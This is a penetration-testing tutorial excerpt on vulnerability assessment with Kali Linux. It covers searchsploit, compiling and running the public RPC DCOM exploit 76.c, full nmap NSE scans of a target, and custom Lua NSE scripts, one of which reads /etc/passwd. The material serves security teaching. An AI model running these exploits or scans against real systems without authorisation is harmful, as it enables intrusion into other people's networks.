Resources for Article:

Further resources on this subject:

Forensics Recovery [article]
Digital and Mobile Forensics [article]
Mobile Forensics and Its Challenges [article]


Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. 
The Exploit Database is also copied locally to Kali, and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following commands:

cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvjf archive.tar.bz2
rm archive.tar.bz2

To search the local copy of exploitdb, open a Terminal window and enter searchsploit followed by the desired search term(s). This invokes a script that searches a database file (.csv) containing a list of all exploits. The search returns a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can then be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the descriptions of the vulnerabilities:

The search script scans each line in the CSV file from left to right, so the order of the search terms is important - a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is oddly case sensitive: although you are instructed to use lowercase characters in the search term, the same term searched with different capitalization can return seven hits in one form and none in another. More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite).
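
If you prefer scripting your own lookups, a few lines of Python give you a case-insensitive, order-independent search over the local CSV. This is only a sketch: the filename files.csv and its location under /usr/share/exploitdb are assumptions that may differ between exploitdb versions, so adjust the path to match your installation.

import sys

# Assumption: the exploitdb index file; the name and location vary across versions.
CSV_PATH = "/usr/share/exploitdb/files.csv"

def search_exploitdb(terms):
    """Print every CSV line that contains all search terms, ignoring case and order."""
    lowered = [t.lower() for t in terms]
    with open(CSV_PATH, encoding="utf-8", errors="replace") as csv_file:
        for line in csv_file:
            haystack = line.lower()
            if all(term in haystack for term in lowered):
                print(line.rstrip())

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: search_exploitdb.py <term> [term ...]")
    search_exploitdb(sys.argv[1:])

Because every term is matched independently against the lowercased line, Oracle 10g and 10g Oracle now return the same results.
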
A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts, such as Perl, Ruby, and PHP, are relatively easy to implement. For example, if the target is a Microsoft IIS 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute it as a standard Perl script, as shown in the following screenshot:

Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot:

The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable, so we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the following command:

root@kali:~# gcc 76.c -o 76.exe

This uses the GNU Compiler Collection to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot:

When you invoke the application against the target, you must call the executable (which is now stored in the /tmp directory) as follows:

root@kali:~# ./76.exe

The source code for this exploit is well documented, and the required parameters are clear at execution time, as shown in the following screenshot:

Unfortunately, not all exploits from the Exploit Database and other public sources compile as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers, listed as follows:

Deliberate errors or incomplete source code are commonly encountered, as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions.
Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development.
Inconsistent behavior due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer.
There is always the risk of freely available code containing malicious functionality. A penetration tester may think that they are conducting a proof of concept (POC) exercise and be unaware that the exploit has also created a backdoor in the application being tested that could be used by the exploit's developer.

To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework.

Vulnerability scanning with nmap

There is no security-oriented distribution without nmap. So far we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services; they also engage nmap to perform vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40, and it ships with 500+ NSE (nmap scripting engine) scripts, as shown in the following screenshot:

Penetration testers utilize nmap's most powerful and flexible features, which allow them to write their own scripts and automate them to ease exploitation. Primarily, the NSE was developed for the following reasons:

Network discovery: The primary purpose for which attackers utilize nmap is network discovery.
Smarter version detection of a service: There are thousands of services, with multiple version details for the same service, so version detection is made more sophisticated.
Vulnerability detection: To automatically identify vulnerabilities in a vast network range; however, nmap itself cannot be a full vulnerability scanner.
Backdoor detection: Some of the scripts are written to identify patterns of worm infections on the network; this makes it easy for attackers to narrow down and focus on taking over the machine remotely.
Vulnerability exploitation: Attackers can also potentially utilize nmap to perform exploitation in combination with other tools such as Metasploit, or write custom reverse shell code and combine it with nmap's exploitation capability.

Before firing up nmap to perform the vulnerability scan, penetration testers must update the nmap script database to see whether any new scripts have been added to it, so that they don't miss vulnerability identification:

nmap --script-updatedb

Running all the scripts against the target host:

nmap -T4 -A -sV -v3 -d -oA Targetoutput --script all --script-args vulns.showall target.com

Introduction to LUA scripting

LUA is a lightweight, embeddable scripting language built on top of the C programming language; it was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. The complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (less than a floppy disk). Some of the security tools developed with LUA support are nmap, Wireshark, and Snort 3.0. One of the reasons why LUA was chosen as the scripting language in information security is its compactness, the absence of buffer overflow and format string vulnerabilities, and the fact that it can be interpreted.

LUA can be installed directly on Kali Linux by issuing the apt-get install lua5.1 command in the Terminal. The following code extract is a sample script that reads a file and prints its first line:

#!/usr/bin/lua
local file = io.open("/etc/passwd", "r")
contents = file:read()
file:close()
print (contents)

LUA is similar to other scripting languages such as Bash and Perl. The preceding script should produce the output shown in the following screenshot:

Customizing NSE scripts

In order to achieve maximum effectiveness, customized scripts help penetration testers find the right vulnerabilities within the given span of time (attackers, however, are not under a time limit). The following code extract is a LUA NSE script to identify a specific file location, which we will search for across the entire subnet using nmap:

local http = require "http"

description = [[
This is my custom discovery on the network
]]

categories = {"safe", "discovery"}

function portrule(host, port)
  return port.number == 80
end

function action(host, port)
  local response = http.get(host, port, "/test.txt")
  if response.status and response.status ~= 404 then
    return "successful"
  end
end

Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested, as shown in the following screenshot; you should be able to run your own NSE script without any problems.

To completely understand the preceding NSE script, here is a description of what is in the code:

local http: requires HTTP - this calls the right library from LUA; the line loads the HTTP library and makes it available locally.
Description: Where testers/researchers can enter the description of the script.
Categories: This typically has two variables, where one declares whether the script is safe or intrusive.